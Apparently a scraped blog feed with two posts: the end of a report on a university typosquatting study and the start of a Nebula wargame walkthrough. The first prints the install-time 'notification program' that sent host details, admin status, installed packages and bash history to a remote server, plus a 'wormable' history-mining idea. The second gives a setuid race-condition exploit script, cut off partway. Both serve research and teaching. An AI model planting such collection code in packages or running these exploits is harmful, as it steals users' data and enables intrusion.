<span class="k">try</span><span class="p">:</span>
<span class="n">hw_info</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">(</span><span class="s1">'lspci'</span><span class="p">,</span>
<span class="n">stderr</span><span class="o">=</span><span class="n">DEVNULL</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
<span class="n">hw_info</span> <span class="o">=</span> <span class="s1">''</span>
<span class="n">hw_info</span> <span class="o">+=</span> <span class="s1">'</span><span class="se">\n</span><span class="s1">'</span> <span class="o">+</span>\
<span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="s1">'free -m'</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
<span class="k">return</span> <span class="n">hw_info</span>
<span class="k">elif</span> <span class="n">sys</span><span class="o">.</span><span class="n">platform</span> <span class="o">==</span> <span class="s1">'darwin'</span><span class="p">:</span>
<span class="c1"># According to https://developer.apple.com/library/</span>
<span class="c1"># mac/documentation/Darwin/Reference/ManPages/</span>
<span class="c1"># man8/system_profiler.8.html</span>
<span class="c1"># no personal information is provided by detailLevel: mini</span>
<span class="k">return</span> <span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="s1">'system_profiler -detailLevel mini'</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">get_all_installed_modules</span><span class="p">():</span>
<span class="c1"># first try the default path</span>
<span class="n">pip_list</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="s1">'pip list'</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
<span class="k">if</span> <span class="n">pip_list</span><span class="p">:</span>
<span class="k">return</span> <span class="n">pip_list</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'nt'</span><span class="p">:</span>
<span class="n">paths</span> <span class="o">=</span> <span class="p">(</span><span class="s1">'C:/Python27'</span><span class="p">,</span>
<span class="s1">'C:/Python34'</span><span class="p">,</span>
<span class="s1">'C:/Python26'</span><span class="p">,</span>
<span class="s1">'C:/Python33'</span><span class="p">,</span>
<span class="s1">'C:/Python35'</span><span class="p">,</span>
<span class="s1">'C:/Python'</span><span class="p">,</span>
<span class="s1">'C:/Python2'</span><span class="p">,</span>
<span class="s1">'C:/Python3'</span><span class="p">)</span>
<span class="c1"># try some paths that make sense to me</span>
<span class="k">for</span> <span class="n">loc</span> <span class="ow">in</span> <span class="n">paths</span><span class="p">:</span>
<span class="n">pip_location</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">loc</span><span class="p">,</span> <span class="s1">'Scripts/pip.exe'</span><span class="p">)</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="n">pip_location</span><span class="p">):</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="s1">'</span><span class="si">{}</span><span class="s1"> list'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">pip_location</span><span class="p">)</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">pip_list</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span>
<span class="n">stderr</span><span class="o">=</span><span class="n">DEVNULL</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
<span class="n">pip_list</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">if</span> <span class="n">pip_list</span><span class="p">:</span>
<span class="k">return</span> <span class="n">pip_list</span>
<span class="k">return</span> <span class="s1">''</span>
<span class="k">def</span> <span class="nf">notify_home</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">package_name</span><span class="p">,</span> <span class="n">intended_package_name</span><span class="p">):</span>
<span class="n">host_os</span> <span class="o">=</span> <span class="n">platform</span><span class="o">.</span><span class="n">platform</span><span class="p">()</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">admin_rights</span> <span class="o">=</span> <span class="nb">bool</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">getuid</span><span class="p">()</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">AttributeError</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">ctypes</span><span class="o">.</span><span class="n">windll</span><span class="o">.</span><span class="n">shell32</span><span class="o">.</span><span class="n">IsUserAnAdmin</span><span class="p">()</span>
<span class="n">admin_rights</span> <span class="o">=</span> <span class="nb">bool</span><span class="p">(</span><span class="n">ret</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
<span class="n">admin_rights</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">!=</span> <span class="s1">'nt'</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">pip_version</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="s1">'pip --version'</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="k">except</span><span class="p">:</span>
<span class="n">pip_version</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">pip_version</span> <span class="o">=</span> <span class="n">platform</span><span class="o">.</span><span class="n">python_version</span><span class="p">()</span>
<span class="n">url_data</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'p1'</span><span class="p">:</span> <span class="n">package_name</span><span class="p">,</span>
<span class="s1">'p2'</span><span class="p">:</span> <span class="n">intended_package_name</span><span class="p">,</span>
<span class="s1">'p3'</span><span class="p">:</span> <span class="s1">'pip'</span><span class="p">,</span>
<span class="s1">'p4'</span><span class="p">:</span> <span class="n">host_os</span><span class="p">,</span>
<span class="s1">'p5'</span><span class="p">:</span> <span class="n">admin_rights</span><span class="p">,</span>
<span class="s1">'p6'</span><span class="p">:</span> <span class="n">pip_version</span><span class="p">,</span>
<span class="p">}</span>
<span class="n">post_data</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'p7'</span><span class="p">:</span> <span class="n">get_command_history</span><span class="p">(),</span>
<span class="s1">'p8'</span><span class="p">:</span> <span class="n">get_all_installed_modules</span><span class="p">(),</span>
<span class="s1">'p9'</span><span class="p">:</span> <span class="n">get_hardware_info</span><span class="p">(),</span>
<span class="p">}</span>
<span class="n">url_data</span> <span class="o">=</span> <span class="n">urlencode</span><span class="p">(</span><span class="n">url_data</span><span class="p">)</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">POST</span><span class="p">(</span><span class="n">url</span> <span class="o">+</span> <span class="n">url_data</span><span class="p">,</span> <span class="n">post_data</span><span class="p">)</span>
<span class="k">if</span> <span class="n">debug</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">response</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">''</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Warning!!! Maybe you made a typo in your installation</span><span class="se">\</span>
<span class="s2"> command or the module does only exist in the python stdlib?!"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Did you want to install '</span><span class="si">{}</span><span class="s2">'</span><span class="se">\</span>
<span class="s2"> instead of '</span><span class="si">{}</span><span class="s2">'??!"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">intended_package_name</span><span class="p">,</span> <span class="n">package_name</span><span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'For more information, please</span><span class="se">\</span>
<span class="s1"> visit http://svs-repo.informatik.uni-hamburg.de/'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="k">if</span> <span class="n">debug</span><span class="p">:</span>
<span class="n">notify_home</span><span class="p">(</span><span class="s1">'http://localhost:8000/app/?'</span><span class="p">,</span>
<span class="s1">'pmba_basic'</span><span class="p">,</span> <span class="s1">'pmba_basic'</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">notify_home</span><span class="p">(</span><span class="s1">'http://svs-repo.informatik.uni-hamburg.de/app/?'</span><span class="p">,</span>
<span class="s1">'pmba_basic'</span><span class="p">,</span> <span class="s1">'pmba_basic'</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>
<h3>Results</h3>
<p>In two empirical phases, exactly <strong>45334 HTTP requests</strong> by <strong>17289 unique hosts</strong> (distinct
IP addresses) were gathered. This means that 17289 distinct hosts executed the program above and sent the data to the webserver which was analyzed in the thesis. The number of HTTP requests is for various reasons higher than the number of distinct IP addresses. The main reason is that <code>pip</code> executes the <code>setup.py</code> file twice on installation. Don't ask me why.</p>
<p>Packages for three different package managers, <code>PyPi (Python)</code>, <code>rubygems.org (Ruby)</code> and <code>npmjs.com (Node.js – Javascript)</code> were uploaded and distributed. Most installations were received from <code>PyPi</code> with 15221 unique installations measured by distinct IP
addresses. Then <code>rubygems.org</code> follows with 1631 distinct installations. <code>Npmjs.com</code> with 525
total unique IP addresses counted, had the smallest number of installations.</p>
<p>At least <strong>43.6% of the 17289</strong> unique IP addresses executed the notification program with <strong>administrative rights</strong>. From the 19603 distinct interactions, 8614 machines used <code>Linux</code> as an operation system, 6174 used <code>Windows</code> and 4758
computers were running <code>OS X</code>. Only 57 hosts (or 0.29%) could not be mapped to one of these
three major operating systems. These were mostly FreeBSD and Java operating systems (Or
in rare instances, junk data that was submitted manually and thus not possible to parse).</p>
<p>Some statistical numbers for the uploaded packages and their installations:</p>
<ul>
<li><strong>214</strong> total different uploaded typo packages on three different package repositories</li>
<li>92 average installations per package</li>
<li>The standard derivation of installations per package is 433 and thus relatively high</li>
<li>The most installed package (urllib2) received <strong>3929 unique installations</strong> in almost 2 weeks
(284 average installations per day)</li>
<li>The most installed package per day was <code>bs4</code> with <strong>366 unique daily installations</strong> on average</li>
<li>The least installed package had only one installation (Probably by a mirror or crawler)</li>
</ul>
<p>The image below visualizes the installations over time. Each point shows the installations on a certain day. The upper plot shows the total number of unique installations on each single day. The light dashed line are the installations with administrative
rights. The bottom plot splits up installations in two sets: From the top five installed packages (circles as markers) and the rest of all packages (squares as markers). Light sub-graphs show the administrative ratio.</p>
<p><img src="/images/dl_over_time_accum.png" alt="Downloads over time" style="width: 700px;"/></p>
<p>In the image below, a reverse lookup was conducted on the gathered IP addresses. The number of hosts for some interesting domains are shown.</p>
<p><img src="/images/table_ts_ns.jpg" alt="Downloads over time" style="width: 600px;"/></p>
<h3>Making the attack wormable</h3>
<p>The basic idea is to make the typosquatting attack <em>wormable</em> by mining typo candidates from the command line history of encountered hosts. The function <code>get_command_history()</code> in the <em>Notification Program</em> above</p>
<div class="highlight"><pre><span></span><code><span class="k">def</span> <span class="nf">get_command_history</span><span class="p">():</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'nt'</span><span class="p">:</span>
<span class="c1"># handle windows</span>
<span class="c1"># http://serverfault.com/questions/95404/</span>
<span class="c1">#is-there-a-global-persistent-cmd-history</span>
<span class="c1"># apparently, there is no history in windows :(</span>
<span class="k">return</span> <span class="s1">''</span>
<span class="k">elif</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'posix'</span><span class="p">:</span>
<span class="c1"># handle linux and mac</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="s1">'cat </span><span class="si">{}</span><span class="s1">/.bash_history | grep -E "pip[23]? install"'</span>
<span class="k">return</span> <span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="n">cmd</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">expanduser</span><span class="p">(</span><span class="s1">'~'</span><span class="p">)))</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
</code></pre></div>
<p>collects the command history involving a <code>pip</code> installation command. Then the package name of the commands are parsed and I looked for all real typos by comparing them to the list of all existing packages in the <code>PyPi</code> index. If the package name wasn't found there, we successfully mined a new typo name.</p>
<p>The analysis of <strong>1454 distinct hosts</strong>, which sent the command history, reveals a concerning result: By mining the command history for typos, several new
high class typo candidates, which <strong>promise large numbers of installations</strong>, have been located. Especially the module names <code>git</code> (misspelled in 90 distinct hosts), <code>scikit</code> (89 unique misspellings)
and <code>bs4</code> (31 hits) seem to be mistyped frequently among independent users. By registering them, lots of typo installations and thus code execution seem to be guaranteed. And the more new installations, the more new mined typo candidates. <em>Worm like behavior</em>.</p>
<p><img src="/images/table_command_history.jpg" alt="Command history mining" style="width: 600px;"/></p>
<h3>Defenses against typo squatting</h3>
<p>In short, read the thesis. If you are too lazy, do the following:</p>
<p><strong>Prevent Direct Code Execution on Installations</strong>
This one is easy. Make sure that the software that unpacks and installs a third party package (<code>pip</code> or <code>npm</code>) does not allow the execution of code that originates from the package itself. Only when the user explicitly loads the package, the library code should be executed.</p>
<p><strong>Generate a List of Potential Typo Candidates</strong>
Generate Levenshtein distance candidates for the most downloaded N packages of the repository and alarm administrators on registration of such a candidate.</p>
<p><strong>Analyze 404 logfiles and prevent registration of often <em>shadow</em> installed packages</strong>
Whenever a user makes a typo by installing a package and the package is not registered yet, a 404 logfile entry on the repository server is created (because the install HTTP requests targets a non-existent resource). Parse these <em>failed installations</em> and prevent all such names that are <em>shadow-installed</em> more than a reasonable threshold per month.</p>
<h3>Conclusion</h3>
<p>If I would have had malicious intentions and if malware was distributed instead of the notification program which only send information to a university web server, then these <strong>17289 unique hosts</strong> would be under my control. At least <strong>43.6 %</strong> of hosts with administrative rights would have given me <strong>8552 computers with complete access</strong> to the whole operating system API.</p>
<p>The results of this thesis showed that creating a botnet by exploiting typo errors from humans is
perfectly possible. However, it is not easy to answer how much the cover of free research from the University covered and prevented a interruption of the empiric study by security researchers.</p>
<p>In the thesis itself, several powerful methods to defend against typo squatting attacks are discussed. Therefore they are not included in this blog post.</p>
<p>In the thesis, the well known programming languages <code>Python</code>, <code>NodeJS</code> and <code>Ruby</code> were attacked. All their package managers were found to be vulnerable to typosquatting attacks. It is of great importance to find out whether other programming languages (such as <code>.NET</code> or <code>Go</code>) suffer from the same problems.</p>Nebula Wargame walkthrough Level 10-192015-09-29T10:30:00+02:002015-10-23T17:26:00+02:00Nikolai Tschachertag:incolumitas.com,2015-09-29:/2015/09/29/nebula-wargame-walkthrough-level-10-19/<p>Walkthrough of nebula wargame from level 10 to level 19</p><h2>Preface</h2>
<p>In the last <a href="https://incolumitas.com/2015/09/28/nebula-wargame-walkthrough-level-0-9/">blog post</a> I covered the Nebula Wargame levels from 0 to 9. Now I will
try to solve the levels 10 to 19. In this blog post I am sharing my thoughts by trying to solve these linux shell exploit exercises.</p>
<h2>Level 10 - Race conditions in network applications</h2>
<p>This level was quite hard for me, compared to the other levels before!</p>
<p>There are two files in the <code>/home/flag10</code> directory:</p>
<ul>
<li>The <code>/home/flag10/flag10</code> setuid binary </li>
<li>A token file which we want to read</li>
</ul>
<p>The setuid binary was compiled from the following code:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdlib.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><sys/types.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><fcntl.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><errno.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><sys/socket.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><netinet/in.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><string.h></span><span class="cp"></span>
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">file</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">host</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">3</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"%s file host</span><span class="se">\n\t</span><span class="s">sends file to host if you have access to it</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">file</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">host</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">access</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="w"> </span><span class="n">R_OK</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">fd</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">ffd</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">rc</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr_in</span><span class="w"> </span><span class="n">sin</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">buffer</span><span class="p">[</span><span class="mi">4096</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Connecting to %s:18211 .. "</span><span class="p">,</span><span class="w"> </span><span class="n">host</span><span class="p">);</span><span class="w"> </span><span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">fd</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span><span class="w"> </span><span class="n">SOCK_STREAM</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">memset</span><span class="p">(</span><span class="o">&</span><span class="n">sin</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr_in</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">sin</span><span class="p">.</span><span class="n">sin_family</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">AF_INET</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">sin</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">inet_addr</span><span class="p">(</span><span class="n">host</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">sin</span><span class="p">.</span><span class="n">sin_port</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">htons</span><span class="p">(</span><span class="mi">18211</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">connect</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">sin</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr_in</span><span class="p">))</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Unable to connect to host %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">host</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="cp">#define HITHERE ".oO Oo.\n"</span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="n">HITHERE</span><span class="p">,</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">HITHERE</span><span class="p">))</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Unable to write banner to host %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">host</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="cp">#undef HITHERE</span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Connected!</span><span class="se">\n</span><span class="s">Sending file .. "</span><span class="p">);</span><span class="w"> </span><span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">ffd</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span><span class="w"> </span><span class="n">O_RDONLY</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">ffd</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Damn. Unable to open file</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">rc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">read</span><span class="p">(</span><span class="n">ffd</span><span class="p">,</span><span class="w"> </span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">buffer</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">rc</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Unable to read from file: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="n">rc</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"wrote file!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"You don't have access to %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">file</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Only after reading the notes in <code>man access</code> it became clear to me how to attack this application. In the manual notes, it is written:</p>
<blockquote>
<p>Warning: Using <code>access()</code> to check if a user is authorized to, for example, open a file before actually doing so using <code>open(2)</code> creates a security hole, because the
user might exploit the short time interval between checking and opening the file to manipulate it. For this reason, the use of this system call should be
avoided. (In the example just described, a safer alternative would be to temporarily switch the process's effective user ID to the real ID and then call
<code>open(2)</code>.)</p>
</blockquote>
<p>So we are going to exploit the fact that we can change the target of a symbolic (or static) link between the <code>access()</code> and <code>open()</code> system call! The fact that
the <code>connect()</code> system call is between the both makes it even more simple, because usually, <code>connect()</code> needs some time to finish.</p>
<p>My exploit is written in Python. I guess you could create a much simpler version in some lines of shell code (like using netcat). But sometimes it's also important
to write your own socket programs to exercise a bit.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">threading</span>
<span class="kn">import</span> <span class="nn">subprocess</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">signal</span>
<span class="n">ip</span> <span class="o">=</span> <span class="s1">'192.168.56.101'</span>
<span class="k">def</span> <span class="nf">run_server</span><span class="p">():</span>
<span class="n">pid</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">getpid</span><span class="p">()</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">address</span> <span class="o">=</span> <span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">18211</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[i] About to run server on </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">address</span><span class="p">))</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">s</span><span class="o">.</span><span class="n">setsockopt</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">SOL_SOCKET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SO_REUSEADDR</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
<span class="n">s</span><span class="o">.</span><span class="n">bind</span><span class="p">(</span><span class="n">address</span><span class="p">)</span>
<span class="n">s</span><span class="o">.</span><span class="n">listen</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="n">conn</span><span class="p">,</span> <span class="n">address</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">accept</span><span class="p">()</span>
<span class="n">t</span> <span class="o">=</span> <span class="n">threading</span><span class="o">.</span><span class="n">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">handle_connection</span><span class="p">,</span> <span class="n">args</span><span class="o">=</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">address</span><span class="p">,</span> <span class="n">pid</span><span class="p">))</span>
<span class="n">t</span><span class="o">.</span><span class="n">start</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">KeyboardInterrupt</span><span class="p">:</span>
<span class="k">if</span> <span class="n">s</span><span class="p">:</span>
<span class="n">s</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="s1">'Pressed Ctrl-C. Exiting...'</span><span class="p">)</span>
